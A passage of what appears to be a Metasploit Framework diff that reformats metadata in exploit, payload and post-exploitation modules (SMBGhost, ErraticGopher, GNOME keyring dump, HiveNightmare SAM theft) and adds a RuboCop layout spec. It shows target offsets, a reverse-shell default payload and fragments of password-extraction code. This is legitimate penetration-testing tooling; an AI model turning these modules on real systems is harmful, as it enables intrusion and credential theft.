-            [ 'URL', 'https://www.coresecurity.com/core-labs/articles/getting-physical-extreme-abuse-of-intel-based-paging-systems-part-2-windows' ],
-            [ 'URL', 'https://labs.bluefrostsecurity.de/blog/2017/05/11/windows-10-hals-heap-extinction-of-the-halpinterruptcontroller-table-exploitation-technique/' ]
-          ],
-        'DefaultOptions' =>
-          {
-            'EXITFUNC' => 'thread',
-            'WfsDelay' => 10
-          },
+        'References' => [
+          [ 'CVE', '2020-0796' ],
+          [ 'URL', 'https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html' ],
+          [ 'URL', 'https://github.com/chompie1337/SMBGhost_RCE_PoC' ],
+          # the rest are not cve-2020-0796 specific but are on topic regarding the techniques used within the exploit
+          [ 'URL', 'https://www.youtube.com/watch?v=RSV3f6aEJFY&t=1865s' ],
+          [ 'URL', 'https://www.coresecurity.com/core-labs/articles/getting-physical-extreme-abuse-of-intel-based-paging-systems' ],
+          [ 'URL', 'https://www.coresecurity.com/core-labs/articles/getting-physical-extreme-abuse-of-intel-based-paging-systems-part-2-windows' ],
+          [ 'URL', 'https://labs.bluefrostsecurity.de/blog/2017/05/11/windows-10-hals-heap-extinction-of-the-halpinterruptcontroller-table-exploitation-technique/' ]
+        ],
+        'DefaultOptions' => {
+          'EXITFUNC' => 'thread',
+          'WfsDelay' => 10
+        },
         'Privileged' => true,
-        'Payload' =>
-          {
-            'Space' => 600,
-            'DisableNops' => true
-          },
+        'Payload' => {
+          'Space' => 600,
+          'DisableNops' => true
+        },
         'Platform' => 'win',
-        'Targets' =>
+        'Targets' => [
           [
-            [
-              'Windows 10 v1903-1909 x64',
-              {
-                'Platform' => 'win',
-                'Arch' => [ARCH_X64],
-                'OverflowSize' => 0x1100,
-                'LowStubFingerprint' => 0x1000600e9,
-                'KuserSharedData' => 0xfffff78000000000,
-                # Offset(From,To) => Bytes
-                'Offset(HalpInterruptController,HalpApicRequestInterrupt)' => 0x78,
-                'Offset(LowStub,SelfVA)' => 0x78,
-                'Offset(LowStub,PML4)' => 0xa0,
-                'Offset(SrvnetBufferHdr,pMDL1)' => 0x38,
-                'Offset(SrvnetBufferHdr,pNetRawBuffer)' => 0x18
-              }
-            ]
-          ],
+            'Windows 10 v1903-1909 x64',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X64],
+              'OverflowSize' => 0x1100,
+              'LowStubFingerprint' => 0x1000600e9,
+              'KuserSharedData' => 0xfffff78000000000,
+              # Offset(From,To) => Bytes
+              'Offset(HalpInterruptController,HalpApicRequestInterrupt)' => 0x78,
+              'Offset(LowStub,SelfVA)' => 0x78,
+              'Offset(LowStub,PML4)' => 0xa0,
+              'Offset(SrvnetBufferHdr,pMDL1)' => 0x38,
+              'Offset(SrvnetBufferHdr,pNetRawBuffer)' => 0x18
+            }
+          ]
+        ],
         'DisclosureDate' => '2020-03-13',
         'DefaultTarget' => 0,
-        'Notes' =>
-        {
+        'Notes' => {
           'AKA' => [ 'SMBGhost', 'CoronaBlue' ],
           'Stability' => [ CRASH_OS_RESTARTS, ],
           'Reliability' => [ REPEATABLE_SESSION, ],

--- a/modules/exploits/windows/smb/smb_rras_erraticgopher.rb
+++ b/modules/exploits/windows/smb/smb_rras_erraticgopher.rb
@@ -33,89 +33,83 @@ class MetasploitModule < Msf::Exploit::Remote
           Windows Server 2003 SP2 (x86); and
           Windows Server 2003 R2 SP2 (x86).
         },
-        'Author' =>
-          [
-            'Equation Group', # ERRATICGOPHER
-            'Shadow Brokers', # Equation Group dump
-            'Víctor Portal', # Python exploit for Windows Server 2003 SP2 with DEP bypass
-            'bcoles', # Metasploit
-          ],
+        'Author' => [
+          'Equation Group', # ERRATICGOPHER
+          'Shadow Brokers', # Equation Group dump
+          'Víctor Portal', # Python exploit for Windows Server 2003 SP2 with DEP bypass
+          'bcoles', # Metasploit
+        ],
         'License' => MSF_LICENSE,
-        'References' =>
-          [
-            ['CVE', '2017-8461'],
-            ['CWE', '119'],
-            ['BID', '99012'],
-            ['EDB', '41929'],
-            ['PACKETSTORM', '147593'],
-            ['URL', 'https://www.securitytracker.com/id/1038701'],
-            ['URL', 'https://github.com/x0rz/EQGRP_Lost_in_Translation/blob/master/windows/exploits/Erraticgopher-1.0.1.0.xml'],
-            ['URL', 'https://support.microsoft.com/en-us/topic/microsoft-security-advisory-4025685-guidance-for-older-platforms-june-13-2017-05151e8a-bd7f-f769-43df-38d2c24f96cd'],
-            ['URL', 'https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa374540(v=vs.85)'],
-            ['URL', 'https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrasm/ebc5c709-36d8-4520-a0ac-6f36d2d6c0b2'],
-            ['URL', 'https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrasm/5dca234b-bea4-4e67-958e-5459a32a7b71'],
-            ['URL', 'https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrasm/4305d67f-9273-49fe-a067-909b6ae8a341'],
-            ['URL', 'https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrasm/3ca0723e-36ea-448a-a97e-1906dd3d07a6'],
-            ['URL', 'https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrasm/dda988f0-4cce-4ffe-b8c9-d5199deafba5'],
-            ['URL', 'https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrasm/169e435d-a975-4c1c-bf41-55fd2bd76125'],
-          ],
-        'DefaultOptions' =>
-          {
-            'EXITFUNC' => 'thread',
-            'PAYLOAD' => 'windows/shell/reverse_tcp'
-          },
+        'References' => [
+          ['CVE', '2017-8461'],
+          ['CWE', '119'],
+          ['BID', '99012'],
+          ['EDB', '41929'],
+          ['PACKETSTORM', '147593'],
+          ['URL', 'https://www.securitytracker.com/id/1038701'],
+          ['URL', 'https://github.com/x0rz/EQGRP_Lost_in_Translation/blob/master/windows/exploits/Erraticgopher-1.0.1.0.xml'],
+          ['URL', 'https://support.microsoft.com/en-us/topic/microsoft-security-advisory-4025685-guidance-for-older-platforms-june-13-2017-05151e8a-bd7f-f769-43df-38d2c24f96cd'],
+          ['URL', 'https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa374540(v=vs.85)'],
+          ['URL', 'https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrasm/ebc5c709-36d8-4520-a0ac-6f36d2d6c0b2'],
+          ['URL', 'https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrasm/5dca234b-bea4-4e67-958e-5459a32a7b71'],
+          ['URL', 'https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrasm/4305d67f-9273-49fe-a067-909b6ae8a341'],
+          ['URL', 'https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrasm/3ca0723e-36ea-448a-a97e-1906dd3d07a6'],
+          ['URL', 'https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrasm/dda988f0-4cce-4ffe-b8c9-d5199deafba5'],
+          ['URL', 'https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrasm/169e435d-a975-4c1c-bf41-55fd2bd76125'],
+        ],
+        'DefaultOptions' => {
+          'EXITFUNC' => 'thread',
+          'PAYLOAD' => 'windows/shell/reverse_tcp'
+        },
         'Privileged' => true,
-        'Payload' =>
-          {
-            'Space' => 1065,
-            'BadChars' => "\x00",
-            'EncoderType' => Msf::Encoder::Type::AlphanumMixed
-          },
+        'Payload' => {
+          'Space' => 1065,
+          'BadChars' => "\x00",
+          'EncoderType' => Msf::Encoder::Type::AlphanumMixed
+        },
         'Platform' => 'win',
         'Arch' => ARCH_X86,
-        'Targets' =>
+        'Targets' => [
+          [ 'Automatic', { 'auto' => true } ],
           [
-            [ 'Automatic', { 'auto' => true } ],
-            [
-              'Windows Server 2003 SP0 (English)',
-              {
-                'os' => 'Windows 2003',
-                'sp' => '',
-                'lang' => 'English'
-              }
-            ],
-            [
-              'Windows Server 2003 SP1 (English) (NX)',
-              {
-                'os' => 'Windows 2003',
-                'sp' => 'Service Pack 1',
-                'lang' => 'English'
-              }
-            ],
-            [
-              'Windows Server 2003 SP2 (English) (NX)',
-              {
-                'os' => 'Windows 2003',
-                'sp' => 'Service Pack 2',
-                'lang' => 'English'
-              }
-            ],
-            [
-              'Windows Server 2003 R2 SP2 (English) (NX)',
-              {
-                'os' => 'Windows 2003 R2',
-                'sp' => 'Service Pack 2',
-                'lang' => 'English'
-              }
-            ],
+            'Windows Server 2003 SP0 (English)',
+            {
+              'os' => 'Windows 2003',
+              'sp' => '',
+              'lang' => 'English'
+            }
           ],
-        'Notes' =>
-          {
-            'AKA' => [ 'ErraticGopher' ],
-            'Stability' => [ CRASH_SERVICE_DOWN ],
-            'SideEffects' => [ IOC_IN_LOGS ],
-            'Reliability' => [ UNRELIABLE_SESSION ]
-          },
+          [
+            'Windows Server 2003 SP1 (English) (NX)',
+            {
+              'os' => 'Windows 2003',
+              'sp' => 'Service Pack 1',
+              'lang' => 'English'
+            }
+          ],
+          [
+            'Windows Server 2003 SP2 (English) (NX)',
+            {
+              'os' => 'Windows 2003',
+              'sp' => 'Service Pack 2',
+              'lang' => 'English'
+            }
+          ],
+          [
+            'Windows Server 2003 R2 SP2 (English) (NX)',
+            {
+              'os' => 'Windows 2003 R2',
+              'sp' => 'Service Pack 2',
+              'lang' => 'English'
+            }
+          ],
+        ],
+        'Notes' => {
+          'AKA' => [ 'ErraticGopher' ],
+          'Stability' => [ CRASH_SERVICE_DOWN ],
+          'SideEffects' => [ IOC_IN_LOGS ],
+          'Reliability' => [ UNRELIABLE_SESSION ]
+        },
         'DefaultTarget' => 0,
         'DisclosureDate' => '2017-06-13'
       )

--- a/modules/payloads/singles/cmd/unix/reverse_tclsh.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_tclsh.rb
@@ -23,11 +23,10 @@ module MetasploitModule
         'Session' => Msf::Sessions::CommandShell,
         'PayloadType' => 'cmd',
         'RequiredCmd' => 'tclsh',
-        'Payload' =>
-          {
-            'Offsets' => {},
-            'Payload' => ''
-          }
+        'Payload' => {
+          'Offsets' => {},
+          'Payload' => ''
+        }
       )
     )
   end

--- a/modules/payloads/stages/windows/peinject.rb
+++ b/modules/payloads/stages/windows/peinject.rb
@@ -25,25 +25,21 @@ module MetasploitModule
           valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks
           are not currently supported. Also PE files which use resource loading might crash.
         },
-        'Author' =>
-          [
-            'ege <egebalci[at]pm.me>'
-          ],
+        'Author' => [
+          'ege <egebalci[at]pm.me>'
+        ],
         'License' => MSF_LICENSE,
         'Platform' => 'win',
         'Arch' => ARCH_X86,
-        'References' =>
-          [
-            'https://github.com/EgeBalci/Amber'
-          ],
-        'PayloadCompat' =>
-          {
-            'Convention' => 'sockedi handleedi -http -https'
-          },
-        'DefaultOptions' =>
-          {
-            'EXITFUNC' => 'thread'
-          }
+        'References' => [
+          'https://github.com/EgeBalci/Amber'
+        ],
+        'PayloadCompat' => {
+          'Convention' => 'sockedi handleedi -http -https'
+        },
+        'DefaultOptions' => {
+          'EXITFUNC' => 'thread'
+        }
       )
     )
   end

--- a/modules/payloads/stages/windows/x64/peinject.rb
+++ b/modules/payloads/stages/windows/x64/peinject.rb
@@ -25,25 +25,21 @@ module MetasploitModule
           valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks
           are not currently supported. Also PE files which use resource loading might crash.
         },
-        'Author' =>
-          [
-            'ege <egebalci[at]pm.me>'
-          ],
-        'References' =>
-          [
-            'https://github.com/EgeBalci/Amber'
-          ],
+        'Author' => [
+          'ege <egebalci[at]pm.me>'
+        ],
+        'References' => [
+          'https://github.com/EgeBalci/Amber'
+        ],
         'License' => MSF_LICENSE,
         'Platform' => 'win',
         'Arch' => ARCH_X64,
-        'PayloadCompat' =>
-          {
-            'Convention' => 'sockrdi handlerdi -http -https'
-          },
-        'DefaultOptions' =>
-          {
-            'EXITFUNC' => 'thread'
-          }
+        'PayloadCompat' => {
+          'Convention' => 'sockrdi handlerdi -http -https'
+        },
+        'DefaultOptions' => {
+          'EXITFUNC' => 'thread'
+        }
       )
     )
   end

--- a/modules/post/android/local/koffee.rb
+++ b/modules/post/android/local/koffee.rb
@@ -20,16 +20,14 @@ class MetasploitModule < Msf::Post
           unit and send CAN bus frames into the Multimedia CAN (M-Can) of the vehicle.
         },
         'SessionTypes' => ['meterpreter'],
-        'Author' =>
-          [
-            'Gianpiero Costantino',
-            'Ilaria Matteucci'
-          ],
-        'References' =>
-          [
-            ['CVE', '2020-8539'],
-            ['URL', 'https://sowhat.iit.cnr.it/pdf/IIT-20-2020.pdf']
-          ],
+        'Author' => [
+          'Gianpiero Costantino',
+          'Ilaria Matteucci'
+        ],
+        'References' => [
+          ['CVE', '2020-8539'],
+          ['URL', 'https://sowhat.iit.cnr.it/pdf/IIT-20-2020.pdf']
+        ],
         'Actions' => [
           [ 'TOGGLE_RADIO_MUTE', { 'Description' => 'It mutes/umutes the radio' } ],
           [ 'REDUCE_RADIO_VOLUME', { 'Description' => 'It decreases the radio volume' } ],

--- a/modules/post/android/manage/remove_lock.rb
+++ b/modules/post/android/manage/remove_lock.rb
@@ -9,33 +9,36 @@ class MetasploitModule < Msf::Post
   include Msf::Post::Common
   include Msf::Post::Android::System
 
-  def initialize(info={})
-    super( update_info( info, {
-        'Name'          => "Android Settings Remove Device Locks (4.0-4.3)",
-        'Description'   => %q{
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        {
+          'Name' => "Android Settings Remove Device Locks (4.0-4.3)",
+          'Description' => %q{
             This module exploits a bug in the Android 4.0 to 4.3 com.android.settings.ChooseLockGeneric class.
             Any unprivileged app can exploit this vulnerability to remove the lockscreen.
             A logic flaw / design error exists in the settings application that allows an Intent from any
             application to clear the screen lock. The user may see that the Settings application has crashed,
             and the phone can then be unlocked by a swipe.
             This vulnerability was patched in Android 4.4.
-        },
-        'License'       => MSF_LICENSE,
-        'Author'        => [
+          },
+          'License' => MSF_LICENSE,
+          'Author' => [
             'CureSec', # discovery
-            'timwr'    # metasploit module
-        ],
-        'References'    =>
-        [
+            'timwr' # metasploit module
+          ],
+          'References' => [
             [ 'CVE', '2013-6271' ],
             [ 'URL', 'http://blog.curesec.com/article/blog/26.html' ],
             [ 'URL', 'http://www.curesec.com/data/advisories/Curesec-2013-1011.pdf' ]
-        ],
-        'SessionTypes'  => [ 'meterpreter', 'shell' ],
-        'Platform'       => 'android',
-        'DisclosureDate' => '2013-10-11'
-      }
-    ))
+          ],
+          'SessionTypes' => [ 'meterpreter', 'shell' ],
+          'Platform' => 'android',
+          'DisclosureDate' => '2013-10-11'
+        }
+      )
+    )
   end
 
   def is_version_compat?
@@ -70,4 +73,3 @@ class MetasploitModule < Msf::Post
     end
   end
 end
-

--- a/modules/post/apple_ios/gather/ios_image_gather.rb
+++ b/modules/post/apple_ios/gather/ios_image_gather.rb
@@ -7,18 +7,21 @@ class MetasploitModule < Msf::Post
   include Msf::Post::File
   include Msf::Auxiliary::Report
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name'          =>  'iOS Image Gatherer',
-      'Description'   =>  %q{
-        This module collects images from iPhones.
-        Module was tested on iOS 10.3.3 on an iPhone 5.
-      },
-      'License'       =>  MSF_LICENSE,
-      'Author'        =>  [ 'Shelby Pace' ], # Metasploit Module
-      'Platform'      =>  [ 'apple_ios' ],
-      'SessionTypes'  =>  [ 'meterpreter' ]
-    ))
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'iOS Image Gatherer',
+        'Description' => %q{
+          This module collects images from iPhones.
+          Module was tested on iOS 10.3.3 on an iPhone 5.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'Shelby Pace' ], # Metasploit Module
+        'Platform' => [ 'apple_ios' ],
+        'SessionTypes' => [ 'meterpreter' ]
+      )
+    )
   end
 
   def enum_img(f_path)

--- a/modules/post/linux/gather/gnome_keyring_dump.rb
+++ b/modules/post/linux/gather/gnome_keyring_dump.rb
@@ -7,19 +7,19 @@ require 'bindata'
 
 class MetasploitModule < Msf::Post
 
-  def initialize(info={})
+  def initialize(info = {})
     super(
       update_info(
         info,
-        'Name'           => 'Gnome-Keyring Dump',
-        'Description'    => %q{
+        'Name' => 'Gnome-Keyring Dump',
+        'Description' => %q{
           Use libgnome-keyring to extract network passwords for the current user.
           This module does not require root privileges to run.
         },
-        'Author'        => 'Spencer McIntyre',
-        'License'       => MSF_LICENSE,
-        'Platform'      => [ 'linux' ],
-        'SessionTypes'  => [ 'meterpreter' ],
+        'Author' => 'Spencer McIntyre',
+        'License' => MSF_LICENSE,
+        'Platform' => [ 'linux' ],
+        'SessionTypes' => [ 'meterpreter' ],
         'Compat' => {
           'Meterpreter' => {
             'Commands' => %w[
@@ -122,7 +122,7 @@ class MetasploitModule < Msf::Post
     )
   end
 
-  def get_string(address, chunk_size=64, max_size=256)
+  def get_string(address, chunk_size = 64, max_size = 256)
     data = ''
     begin
       data << session.railgun.memread(address + data.length, chunk_size)
@@ -177,6 +177,7 @@ class MetasploitModule < Msf::Post
   def resolve_host(name)
     address = @hostname_cache[name]
     return address unless address.nil?
+
     vprint_status("Resolving hostname: #{name}")
     begin
       address = session.net.resolve.resolve_host(name)[:ip]
@@ -187,12 +188,12 @@ class MetasploitModule < Msf::Post
 
   def resolve_port(service)
     port = {
-      'ftp'   => 21,
-      'http'  => 80,
+      'ftp' => 21,
+      'http' => 80,
       'https' => 443,
-      'sftp'  => 22,
-      'ssh'   => 22,
-      'smb'   => 445
+      'sftp' => 22,
+      'ssh' => 22,
+      'smb' => 445
     }[service]
     port.nil? ? 0 : port
   end
@@ -220,7 +221,7 @@ class MetasploitModule < Msf::Post
     list_anchor = result['results'].unpack(session.native_arch == ARCH_X64 ? 'Q' : 'L')[0]
     fail_with(Failure::NoTarget, 'Did not receive a list of passwords') if list_anchor == 0
 
-    entry = {:next_ptr => list_anchor}
+    entry = { :next_ptr => list_anchor }
     begin
       entry = get_list_entry(entry[:next_ptr])
       pw_data = entry[:data]
@@ -229,8 +230,10 @@ class MetasploitModule < Msf::Post
         value = pw_data[field]
         pw_data[field] = nil
         next if value == 0
+
         value = get_string(value)
         next if value.empty?
+
         pw_data[field] = value
       end
 
@@ -249,6 +252,7 @@ class MetasploitModule < Msf::Post
 
       pw_data[:port] = resolve_port(pw_data[:protocol]) if pw_data[:port] == 0 and !pw_data[:protocol].nil?
       next if pw_data[:port] == 0  # can't report without a valid port
+
       ip_address = resolve_host(pw_data[:server])
       next if ip_address.nil?      # can't report without an ip address
 
@@ -260,7 +264,6 @@ class MetasploitModule < Msf::Post
         username: pw_data[:user],
         password: pw_data[:password]
       )
-
     end while entry[:next_ptr] != list_anchor and entry[:next_ptr] != 0
 
     libgnome_keyring.gnome_keyring_network_password_list_free(list_anchor)

--- a/modules/post/multi/gather/enum_hexchat.rb
+++ b/modules/post/multi/gather/enum_hexchat.rb
@@ -25,17 +25,15 @@ class MetasploitModule < Msf::Post
         'Author' => ['sinn3r', 'h00die'],
         'Platform' => ['linux'],
         'SessionTypes' => ['shell', 'meterpreter'],
-        'Actions' =>
-          [
-            ['CONFIGS', { 'Description' => 'Collect config files' } ],
-            ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],
-            ['ALL', { 'Description' => 'Collect both the configs and chat logs' }]
-          ],
+        'Actions' => [
+          ['CONFIGS', { 'Description' => 'Collect config files' } ],
+          ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],
+          ['ALL', { 'Description' => 'Collect both the configs and chat logs' }]
+        ],
         'DefaultAction' => 'ALL',
-        'References' =>
-          [
-            ['URL', 'https://hexchat.readthedocs.io/en/latest/settings.html']
-          ]
+        'References' => [
+          ['URL', 'https://hexchat.readthedocs.io/en/latest/settings.html']
+        ]
       )
     )
     register_options([

--- a/modules/post/osx/escalate/tccbypass.rb
+++ b/modules/post/osx/escalate/tccbypass.rb
@@ -31,10 +31,9 @@ class MetasploitModule < Msf::Post
           ['URL', 'https://medium.com/@mattshockl/cve-2020-9934-bypassing-the-os-x-transparency-consent-and-control-tcc-framework-for-4e14806f1de8'],
           ['URL', 'https://github.com/mattshockl/CVE-2020-9934'],
         ],
-        'Notes' =>
-          {
-            'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ]
-          },
+        'Notes' => {
+          'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ]
+        },
         'Platform' => [ 'osx' ],
         'SessionTypes' => [ 'shell', 'meterpreter' ]
       )

--- a/modules/post/windows/gather/bloodhound.rb
+++ b/modules/post/windows/gather/bloodhound.rb
@@ -14,11 +14,10 @@ class MetasploitModule < Msf::Post
           identify within an Active Directory environment.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'h4ng3r <h4ng3r@computerpirate.me>',
-            'h00die'
-          ],
+        'Author' => [
+          'h4ng3r <h4ng3r@computerpirate.me>',
+          'h00die'
+        ],
         'References' => [ 'URL', 'https://github.com/BloodHoundAD/BloodHound/' ],
         'Platform' => [ 'win' ],
         'Arch' => [ ARCH_X86, ARCH_X64 ],

--- a/modules/post/windows/gather/credentials/windows_sam_hivenightmare.rb
+++ b/modules/post/windows/gather/credentials/windows_sam_hivenightmare.rb
@@ -18,29 +18,26 @@ class MetasploitModule < Msf::Post
           stored in `store_loot`, you can dump the hashes with some external scripts like secretsdump.py
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Kevin Beaumont', # Discovery and original POC on www.github.com
-            'romarroca', # POC on www.github.com
-            'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
-          ],
-        'References' =>
-          [
-            ['CVE', '2021-36934'],
-            ['URL', 'https://github.com/GossiTheDog/HiveNightmare'],
-            ['URL', 'https://isc.sans.edu/diary/Summer+of+SAM+-+incorrect+permissions+on+Windows+1011+hives/27652'],
-            ['URL', 'https://github.com/romarroca/SeriousSam']
-          ],
+        'Author' => [
+          'Kevin Beaumont', # Discovery and original POC on www.github.com
+          'romarroca', # POC on www.github.com
+          'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
+        ],
+        'References' => [
+          ['CVE', '2021-36934'],
+          ['URL', 'https://github.com/GossiTheDog/HiveNightmare'],
+          ['URL', 'https://isc.sans.edu/diary/Summer+of+SAM+-+incorrect+permissions+on+Windows+1011+hives/27652'],
+          ['URL', 'https://github.com/romarroca/SeriousSam']
+        ],
         'DisclosureDate' => '2021-07-20',
         'Platform' => [ 'win' ],
         'SessionTypes' => [ 'meterpreter' ],
-        'Notes' =>
-          {
-            'AKA' => [ 'HiveNightmare', 'SeriousSAM' ],
-            'Reliability' => [ ],
-            'SideEffects' => [ ],
-            'Stability' => [ CRASH_SAFE ]
-          }
+        'Notes' => {
+          'AKA' => [ 'HiveNightmare', 'SeriousSAM' ],
+          'Reliability' => [ ],
+          'SideEffects' => [ ],
+          'Stability' => [ CRASH_SAFE ]
+        }
       )
     )
     register_options([

--- a/modules/post/windows/gather/enum_hyperv_vms.rb
+++ b/modules/post/windows/gather/enum_hyperv_vms.rb
@@ -18,10 +18,9 @@ class MetasploitModule < Msf::Post
         'License' => MSF_LICENSE,
         'Platform' => ['win'],
         'SessionTypes' => ['meterpreter'],
-        'Author' =>
-          [
-            'gwillcox-r7' # Metasploit post module
-          ],
+        'Author' => [
+          'gwillcox-r7' # Metasploit post module
+        ],
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [],

--- a/modules/post/windows/gather/forensics/fanny_bmp_check.rb
+++ b/modules/post/windows/gather/forensics/fanny_bmp_check.rb
@@ -24,8 +24,7 @@ class MetasploitModule < Msf::Post
         'Author' => ['William M.'],
         'Platform' => ['win'],
         'SessionTypes' => ['meterpreter', 'shell'],
-        'References' =>
-        [
+        'References' => [
           ['URL', 'https://securelist.com/a-fanny-equation-i-am-your-father-stuxnet/68787'],
           ['CVE', '2010-2568']
         ]

--- a/spec/rubocop/cop/layout/module_hash_values_on_same_line_spec.rb
+++ b/spec/rubocop/cop/layout/module_hash_values_on_same_line_spec.rb
@@ -1,0 +1,305 @@
+# frozen_string_literal: true
+require 'spec_helper'
+require 'rubocop/cop/layout/module_hash_values_on_same_line'
+
+RSpec.describe RuboCop::Cop::Layout::ModuleHashValuesOnSameLine do
+  subject(:cop) { described_class.new(config) }
+  let(:config) do
+    RuboCop::Config.new(
+      'Layout/IndentationWidth' => {
+        'Width' => indentation_width
+      })
+  end
+  let(:indentation_width) { 2 }
+
+  it 'accepts hash values being on the same line' do
+    expect_no_offenses(<<~RUBY)
+      class DummyModule
+        def initialize(info = {})
+          super(
+            update_info(
+              info,
+              'Name'          => 'Simple module name',
+              'Description'   => 'Lorem ipsum dolor sit amet',
+              'Author'        => [ 'example1', 'example2' ],
+              'License'       => MSF_LICENSE,
+              'Platform'      => 'win',
+              'Arch'          => ARCH_X86,
+            )
+          )
+        end
+      end
+    RUBY
+  end
+
+  it 'accepts hash values across multipline lines' do
+    expect_no_offenses(<<~RUBY)
+      class DummyModule
+        def initialize(info = {})
+          super(
+            update_info(
+              info,
+              'Name'          => 'Simple module name',
+              'Description'   => 'Lorem ipsum dolor sit amet',
+              'Author'        => [
+                'example1',
+                'example2'
+              ],
+              'License'       => MSF_LICENSE,
+              'Platform'      => 'win',
+              'Arch'          => ARCH_X86,
+            )
+          )
+        end
+      end
+    RUBY
+  end
+
+  it 'registers an offence when a hash value is on its own line' do
+    expect_offense(<<~RUBY)
+      class DummyModule
+        def initialize(info = {})
+          super(update_info(info,
+            'Name'          => 'Simple module name',
+            'Description'   => 'Lorem ipsum dolor sit amet',
+            'Author'        =>
+              [ 'example1', 'example2' ],
+              ^ a hash value should open on the same line as its key
+            'License'       => MSF_LICENSE,
+            'Platform'      => 'win',
+            'Arch'          => ARCH_X86,
+            ))
+        end
+      end
+    RUBY
+  end
+
+  it 'ensures merge_info functions are handled correctly' do
+    expect_offense(<<~RUBY)
+      class DummyModule
+        def initialize(info = {})
+          super(merge_info(
+            info,
+            'Name'          => 'Simple module name',
+            'Description'   => 'Lorem ipsum dolor sit amet',
+            'Author'        =>
+              [
+              ^ a hash value should open on the same line as its key
+                'example1',
+                'example2'
+              ],
+            'License'       => MSF_LICENSE,
+            'Platform'      => 'win',
+            'Arch'          => ARCH_X86,
+            ))
+          register_options([])
+        end
+      end
+    RUBY
+
+    expect_correction(<<~RUBY)
+      class DummyModule
+        def initialize(info = {})
+          super(merge_info(
+            info,
+            'Name'          => 'Simple module name',
+            'Description'   => 'Lorem ipsum dolor sit amet',
+            'Author' => [
+                'example1',
+                'example2'
+              ],
+            'License'       => MSF_LICENSE,
+            'Platform'      => 'win',
+            'Arch'          => ARCH_X86,
+            ))
+          register_options([])
+        end
+      end
+    RUBY
+  end
+
+  it 'handles comments between the new lines' do
+    expect_offense(<<~RUBY)
+      class DummyModule
+        def initialize(info = {})
+          super(merge_info(
+            info,
+            'Name'          => 'Simple module name',
+            'Description'   => 'Lorem ipsum dolor sit amet',
+            'Author' => [
+                'example1',
+                'example2'
+              ],
+            'Notes' => # Note that reliability isn't included here, as technically the exploit can only
+            # only be run once, after which the service crashes.
+            {
+            ^ a hash value should open on the same line as its key
+              'SideEffects' => [ CONFIG_CHANGES ], # This module will change the configuration by
+              # resetting the router to the default factory password.
+              'Stability' => [ CRASH_SERVICE_DOWN ] # This module will crash the target service after it is run.
+            },
+            'License'       => MSF_LICENSE,
+            'Platform'      => 'win',
+            'Arch'          => ARCH_X86,
+            ))
+          register_options([])
+        end
+      end
+    RUBY
+
+    expect_correction(<<~RUBY)
+      class DummyModule
+        def initialize(info = {})
+          super(merge_info(
+            info,
+            'Name'          => 'Simple module name',
+            'Description'   => 'Lorem ipsum dolor sit amet',
+            'Author' => [
+                'example1',
+                'example2'
+              ],
+            # Note that reliability isn't included here, as technically the exploit can only
+            # only be run once, after which the service crashes.
+            'Notes' => {
+              'SideEffects' => [ CONFIG_CHANGES ], # This module will change the configuration by
+              # resetting the router to the default factory password.
+              'Stability' => [ CRASH_SERVICE_DOWN ] # This module will crash the target service after it is run.
+            },
+            'License'       => MSF_LICENSE,
+            'Platform'      => 'win',
+            'Arch'          => ARCH_X86,
+            ))
+          register_options([])
+        end
+      end
+    RUBY
+  end
+
+  it 'handles an implicit hash' do
+    expect_offense(<<~RUBY)
+      class DummyModule
+        def initialize(info = {})
+          super(
+            'Name'          => 'Simple module name',
+            'Description'   => 'Lorem ipsum dolor sit amet',
+            'Author' => [
+                'example1',
+                'example2'
+              ],
+            'Notes' => # Note that reliability isn't included here, as technically the exploit can only
+            # only be run once, after which the service crashes.
+            {
+            ^ a hash value should open on the same line as its key
+              'SideEffects' => [ CONFIG_CHANGES ], # This module will change the configuration by
+              # resetting the router to the default factory password.
+              'Stability' => [ CRASH_SERVICE_DOWN ] # This module will crash the target service after it is run.
+            },
+            'License'       => MSF_LICENSE,
+            'Platform'      => 'win',
+            'Arch'          => ARCH_X86,
+            )
+          register_options([])
+        end
+      end
+    RUBY
+
+    expect_correction(<<~RUBY)
+      class DummyModule
+        def initialize(info = {})
+          super(
+            'Name'          => 'Simple module name',
+            'Description'   => 'Lorem ipsum dolor sit amet',
+            'Author' => [
+                'example1',
+                'example2'
+              ],
+            # Note that reliability isn't included here, as technically the exploit can only
+            # only be run once, after which the service crashes.
+            'Notes' => {
+              'SideEffects' => [ CONFIG_CHANGES ], # This module will change the configuration by
+              # resetting the router to the default factory password.
+              'Stability' => [ CRASH_SERVICE_DOWN ] # This module will crash the target service after it is run.
+            },
+            'License'       => MSF_LICENSE,
+            'Platform'      => 'win',
+            'Arch'          => ARCH_X86,
+            )
